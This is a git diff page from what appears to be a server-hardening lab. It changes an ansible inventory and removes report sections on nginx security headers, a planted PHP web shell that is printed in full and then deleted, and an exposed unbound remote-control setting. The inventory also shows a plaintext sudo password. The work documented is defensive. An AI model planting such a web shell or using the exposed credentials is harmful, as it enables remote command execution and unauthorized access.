Compare commits
No commits in common. "0c57c12ac8ae59509a43fa53a14e4c553cdecc0e" and "512acb8db3ce6321eb797a7471b5fa9903b7b9de" have entirely different histories.
0c57c12ac8
...
512acb8db3
|
@ -5,6 +5,7 @@ all:
|
|||
ansible_connection: ssh
|
||||
ansible_become: yes
|
||||
ansible_become_method: sudo
|
||||
ansible_host: 64.227.120.192
|
||||
ansible_ssh_user: root
|
||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
|
||||
ansible_host: ml-node
|
||||
ansible_ssh_user: ml-node
|
||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
|
||||
ansible_become_pass: dobercaj420
|
||||
|
|
105
report/Report.md
105
report/Report.md
|
@ -274,90 +274,6 @@ server {
|
|||
```
|
||||
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
||||
|
||||
Lets enable xss protection in the nginx configuration.
|
||||
|
||||
```bash
|
||||
location /2048/ {
|
||||
proxy_pass http://localhost:8018/;
|
||||
proxy_set_header Host $host;
|
||||
# Add security headers
|
||||
add_header X-Frame-Options "SAMEORIGIN";
|
||||
add_header X-Content-Type-Options "nosniff";
|
||||
add_header X-XSS-Protection "1; mode=block";
|
||||
}
|
||||
```
|
||||
|
||||
And deny access to the all `.` files.
|
||||
|
||||
```bash
|
||||
location ~ /\. {
|
||||
deny all;
|
||||
}
|
||||
```
|
||||
|
||||
The process is run by the `conmon` process.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# sudo lsof -i :8018
|
||||
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
||||
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
|
||||
|
||||
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
|
||||
```
|
||||
|
||||
It is a podman container.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# podman ps
|
||||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
|
||||
root@ls-2024-9:~#
|
||||
```
|
||||
|
||||
When going into the container we can see the php reverse shell script.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
|
||||
root@4d05d4a1a404:/var/www/html# ls
|
||||
app.js assets index.html manifest.json service-worker.js shell.php style.css
|
||||
root@4d05d4a1a404:/var/www/html# cat shell.php
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>CMD</title>
|
||||
<style type="text/css">
|
||||
body {
|
||||
background: black;
|
||||
font-family: courier,arial;
|
||||
color: white;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<br/><br/><br/>
|
||||
<center>
|
||||
<form method="POST">
|
||||
<input type="text" name="cmd" placeholder="cmd" size=100/>
|
||||
<input type="submit" value="exec"/>
|
||||
</form>
|
||||
</center>
|
||||
<br/><br/><br/>
|
||||
<?php
|
||||
if(isset($_POST['cmd'])){
|
||||
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
root@4d05d4a1a404:/var/www/html#
|
||||
```
|
||||
|
||||
Lets remove the file now.
|
||||
|
||||
```bash
|
||||
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
|
||||
```
|
||||
|
||||
### Already f-up something
|
||||
|
||||
|
@ -462,24 +378,3 @@ Host ls2024_prep
|
|||
|
||||
### DNS
|
||||
|
||||
Problem here is that remote control is enabled and we can use it to get the root shell.
|
||||
|
||||
```txt
|
||||
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
|
||||
# default unbound control
|
||||
remote-control:
|
||||
control-enable: yes
|
||||
control-interface: ::0
|
||||
control-use-cert: no
|
||||
```
|
||||
|
||||
Lets disable remote control completely. and restart the service.
|
||||
|
||||
```bash
|
||||
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||
```
|
||||
|
||||
This is all I found suspicious in the DNS configuration.
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue